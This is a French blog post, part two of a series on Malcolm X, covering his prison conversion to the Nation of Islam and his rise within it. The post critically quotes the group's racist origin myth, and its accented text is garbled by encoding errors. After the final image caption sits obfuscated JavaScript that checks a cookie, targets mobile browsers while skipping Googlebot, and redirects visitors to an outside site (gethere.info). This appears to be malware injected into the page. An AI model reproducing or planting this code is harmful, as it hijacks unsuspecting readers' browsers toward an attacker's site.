PARTIE 1 : https://raisonnances.net/malcolm-x-1ere-partie-du-berceau-a-la-case-prison/

Malcolm Little rentre en prison avant de souffler ses vingt-et-une bougies, il est jeune, insolent et inspire la crainte et le respect. Dans les prisons amA�ricaines, nombre de dA�tenus se tournent alors vers la spiritualitA�, la majoritA� A�crasante, vers le christianisme. Mais Malcolm refuse catA�goriquement de faire partie de ces gens, il refuse de se laisser attendrir et cultive la haine. Ca��est dans ce contexte qua��il menace, A� titre prA�ventif, quiconque oserait lui parler de Dieu. Dans le pA�nitencier, cette attitude lui vaut le surnom de Satan.

RA�ginald et Philbert, deux de ses frA?res, viennent de rentrer dans la NOI (Nation Of Islam), organisation suprA�matiste noire se rA�clamant abusivement de la��islam. Ce dernier prend les devants et envoie une lettre A� Malcolm pour la��inviter A� adhA�rer A� la NOI. Celui qui se fait appeler Satan en prison ne se gA?ne pas de lui dire ce qua��il pense de sa A� sainte A� A�glise. Reginald, quant A� lui, connait trop bien Malcolm que pour tenter de lui parler de Dieu, de ProphA�tie, de respect ou da��amour fraternel. Il rA�dige une lettre en sa��adressant A� lui selon son langage et son tempA�rament : A� Malcolm, ne mange plus de porc et ne fume plus. Je te montrerai comment sortir de prison A�.[1] Malcolm accepte de suivre la recommandation, mA?me sa��il est loin de comprendre comment, il estime que si son frA?re lui dit que ca��est une faA�on de sortir de prison ca��est que cela doit la��A?tre. Ca��est ainsi qua��il va, de fil en aiguille, commencer A� suivre les prA�ceptes de la NOI jusqua��au jour oA?, depuis sa cellule, il reA�oit une lettre du A� vA�nA�rable A� Elijah Muhammad, chef et A� ProphA?te A� des musulmans noirs de la NOI. Ce dernier y dit : A� Tu ne sais pas qui tu es. Tu ne sais mA?me pas, parce que le Blanc sa��est bien gardA� de te le dire, que tu appartiens A� une civilisation trA?s ancienne, riche en or et en rois. Tu ne connais mA?me pas ton vrai nom de famille, tu ne reconnaA�trais pas ta propre langue si tu la��entendais parler. La��homme blanc ta��a bien aliA�nA�. Depuis le jour oA? le diable blanc ta��a assassinA�, violA�, arrachA� A� ta terre natale dans la personne de tes ancA?tres, tu as A�tA� sa victime. A�[2]

Il dA�cide alors da��abandonner son nom de famille. A� Little A� na��A�tait que le nom donnA� par un maA�tre blanc A� son ancA?tre, esclave noir, il le remplace par le symbole de la��inconnue mathA�matique, le A� X A�. DorA�navant il sera Malcolm X, membre de la Nation Of Islam, disciple du ProphA?te Elijah Muhammad et descendant da��une civilisation trA?s ancienne, riche en or et en rois, malheureusement dA�pouillA�e depuis longtemps par les diables blancs.

Malcolm X reA�oit de nombreuses lettres da��autres disciples da��Elijah et commence A� changer. Il dA�cide de se former de faA�on intensive depuis sa cellule afin de rattraper toutes les annA�es perdues. Il se retire et passe son temps A� lire, de jour comme de nuit, il lit tout ce qui lui passe entre les mains. Il dira plus tard qua��il na��a jamais A�tA� aussi libre qua��en prison car, lA�-bas, il avait un accA?s total au savoir et aucune autre responsabilitA�. Afin da��enrichir son vocabulaire, il dA�cide mA?me da��A�tudier le dictionnaire et en recopie chaque mot avec sa dA�finition. Il se sent investi da��une mission, les Noirs ont A�tA� trompA�s par les Blancs depuis trop longtemps et il doit se prA�parer A� les informer. En parallA?le, il participe rA�guliA?rement A� la��atelier de dA�bats organisA� pour les prisonniers, il y apprend ainsi A� dA�fendre des idA�es, A� argumenter, et A� dA�monter mA�thodologiquement les contre-arguments de ses opposants.

A� Lorsque je dA�couvris, peu aprA?s, en prison, AllA?h et la religion islamique, ma vie fut transformA�e. A�[3]

Sa conception de la foi islamique est pourtant, A� cette A�poque, grotesque et totalement erronA�e :

  • Il voue un culte au leader du Mouvement, Elijah Muhammad, et comme tous les autres disciples de la NOI, il la��idolA?tre, considA?re qua��il est ProphA?te et le divinise. Ces croyances sont incompatibles avec le premier pilier de la��Islam : la��intime conviction qua��il na��y a de Dieu que Dieu et que Mohammed (i�?) est son Messager a�� considA�rA� comme le sceau de la prophA�tie : le dernier des ProphA?tes.
  • Les thA?ses et les discours de la NOI sont haineux et belliqueux envers les Blancs, qui dans sa conception suprA�matiste noire, sont considA�rA�s comme des A� diables A�. Pourtant, le ProphA?te de la��Islam (i�?) rappela lors de son sermon da��adieu : A� Toute l’humanitA� descend de Adam et Eve. Un Arabe n’est pas supA�rieur A� un non-Arabe et un non-Arabe n’est pas supA�rieur A� un Arabe. Un Blanc n’est pas supA�rieur A� un Noir et un Noir n’est pas supA�rieur A� un Blanc, si ce na��est seulement par la piA�tA� et la bonne action. A�[4]
  • Bien que non-orthodoxes, les pratiques de la NOI na��en restent pas moins rigides. Le Mouvement impose la duretA�, la fermetA� et sa��organise de faA�on quasi militarisA�e. Les codes vestimentaires, familiaux, sociaux, culturels, religieux sont extrA?mement contraignants et toute entrave A� la rA?gle entraine le bannissement temporaire ou dA�finitif de la��organisation religieuse. Cette conception de la vie est A�galement incompatible avec la��Islam tel qua��il a A�tA� rA�vA�lA� A� notre ProphA?te Mohammed (i�?). La��islam na��est pas venu pour contraindre les Hommes mais pour les libA�rer : {Nulle contrainte en religion}. (Coran, 2 : 256)
La��origine de la��homme blanc selon la Nation Of Islam

A� Au commencement, la lune avait A�tA� sA�parA�e de la terre. Ensuite les premiers hommes, les hommes noirs, fondA?rent la ville sainte de La Mecque [a��] Il y a environ 6.600 ans, soixante-dix pour cent des gens A�taient contents, et trente pour cent mA�contents. Parmi les mA�contents, il y avait un certain « Monsieur Yacub » [a��] Il avait appris, entre autres, A� A�lever de nouvelles races par des mA�thodes scientifiques [a��] Il fit tant d’adeptes que les autoritA�s, alarmA�es, l’exilA?rent avec ses 59 999 disciples dans l’A�le de Patmos [a��] furieux contre AllA?h, M. Yacub rA�solut de se venger en crA�ant une race diabolique, une race dA�colorA�e, blanche [a��] M. Yacub voulut enfreindre les lois de la nature ; il eut la��idA�e da��utiliser ce que nous appelons aujourda��hui la structure des gA?nes rA�cessifs pour sA�parer les deux germes, noir et brun. Cela fait, il devait greffer le germe brun A� da��autres germes bruns pour qua��apparaisse une progA�niture toujours plus claire, plus faible, plus apte A� faire le mal. Ca��est ainsi qua��il devait crA�er la race blanche [a��] Au bout de six siA?cles, elle quitta la��A�le et rejoignit les Noirs sur le continent. En racontant des mensonges, en dressant les Noirs les uns contre les autres, la race diabolique transforma en six mois leur paradis terrestre en un enfer. A�[5]

 

Comme des milliers da��autres Afro-AmA�ricains, ce sont ces trois conceptions de la religion a�� aussi distantes soient-elles da��une religion traditionnelle et fitrique[6] a�� qui ont rA�pondu, sur trois plans, A� sa vulnA�rabilitA�.[7]

PremiA?rement, il sa��est construit, comme tout enfant, A� partir de la��image de ses parents : affaiblis, constamment humiliA�s et persA�cutA�s. La��absence de repA?res stables durant la��enfance de Malcolm crA�e un vide affectif, offrant un terrain fertile A� l’idolA?trie da��un imposteur comme Elijah Muhammad, qua��il considA�rera alors comme un pA?re, comme un sauveur.

DeuxiA?mement, la NOI donne sens A� sa haine et avance une origine divine A� son ressentiment contre les Blancs. Durant son enfance, il a tentA�, dans un premier temps, de se contenir malgrA� la��exclusion constante en raison de sa couleur, mais, par la suite, la��agressivitA� la��emporte et devient pour lui signe de force. GrA?ce A� la NOI, sa colA?re et sa haine deviennent non seulement lA�gitimes, mais peuvent dorA�navant servir la cause des Noirs. Il dira plus tard qua��en pensant se dA�saliA�ner, en rA�alitA�, il ne faisait que sa��aliA�ner une deuxiA?me fois.

En troisiA?me lieu, la��attirance par la rigiditA� des pratiques est un signe du dA�sA�quilibre dans la��enfance et la jeunesse. Son laxisme par le passA� le pousse A� rechercher la restriction et la NOI lui procure, dans les grandes lignes, le cadre que peut procurer une spiritualitA� A� la��Homme, un espace de sA�curitA�. Mais, alors que la��Islam authentique offre un cadre de vie A� la��humain la��invitant au juste milieu, la NOI, quant A� elle, dA�sire transformer les Afro-AmA�ricains en clones. Leur pratique A� religieuse A� est fondA�e sur la frustration, la peur et les inA�galitA�s et non sur la paix, la��amour et la fraternitA�.

{Nous avons fait de vous une communautA� du juste milieu.} (Coran, 2 : 143)

A� sa sortie de prison, Malcolm X grimpe rapidement les A�chelons du Mouvement. Il devient pasteur (la��A�quivalent de la��imam dans la NOI) dans un A� temple musulman[8] A�, puis, commence A� en fonder da��autres partout aux A�tats-Unis[9]. Il est acclamA� de toutes parts, voyage da��une ville A� la��autre, da��un A�tat A� la��autre, et commence mA?me, selon certains dires, A� faire de la��ombre au A� ProphA?te A� de la NOI, le grand Elijah Muhammad. Les mA�dias se font un malin plaisir A� le mettre en avant et A� populariser son message : il est invitA� A� la radio, A� la tA�lA�vision ; la��homme noir qui traite les Blancs de diables intrigue les AmA�ricains. Ses prA?ches enflammA�s, mettant en exergue les dA�plorables conditions de vie des Noirs en AmA�rique et appelant A� sa��organiser, attirent des dizaines de milliers de sympathisants. Des nouveaux temples, ouverts grA?ce aux donations des disciples, accueillent alors, un peu partout, la communautA� toujours croissante de la NOI.

Pourtant, dA?s le dA�but des annA�es  60, la��expansion du Mouvement commence A� sa��endiguer. Des rumeurs liA�es au mode de vie da��Elijah Muhammad vont entacher la NOI. De son cotA�, Malcolm se fait de plus en plus da��ennemis de la��intA�rieur, da��aucuns considA?rent qua��il a pris trop de place dans le Mouvement et qua��il est temps pour lui de prendre des distances. A� la suite da��une dA�claration publique non autorisA�e par la NOI, il sera alors A� temporairement A� condamnA� au silence par le A� vA�nA�rable A� Elijah Muhammad en personnea��

A suivre…

 

Sources :

Malcolm X (et Alex Haley), La��autobiographie de Malcolm X, Paris, Presses Pocket, 1993

Tariq Ramadan, La vie de Malcolm X, https://www.youtube.com/watch?v=0pnapPMPEWA

[1] Malcolm X (et Alex Haley), La��autobiographie de Malcolm X, Paris, Presses Pocket, 1993, p. 136.

[2] Malcolm X, op. cit., p. 142.

[3] Malcolm X, op. cit., p. 129.

[4] Paroles tenues lors da��un sermon du ProphA?te (i�?) peu de temps avant sa mort, prA?s du mont Arafat, devant des dizaines de milliers de compagnons.

[5] Malcolm X, op. cit., pp.  142-150

[6] Propre A�  la fitra, la nature originelle de la��Homme.

[7] Tariq Ramadan, La vie de Malcolm X.

[8] Les membres de la NOI se rA�unissent au temple et non A� la mosquA�e. Beaucoup de pratiques et de qualificatifs du Mouvement sont calquA�s du protestantisme.

[9] Malcolm X a A� fondA� ou aidA� A� fonder la plupart des cent et quelques mosquA�es [temples] ouvertes dans les cinquante A�tats AmA�ricains. Il ma��arrivait de sillonner la��AmA�rique da��est en ouest, trois ou quatre fois par semaine. Souvent je ne dormais qua��en avion. A� Malcolm X, op. cit., p. 252.

Image : Elijah Muhammad avec, A� sa droite, Malcolm X.var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}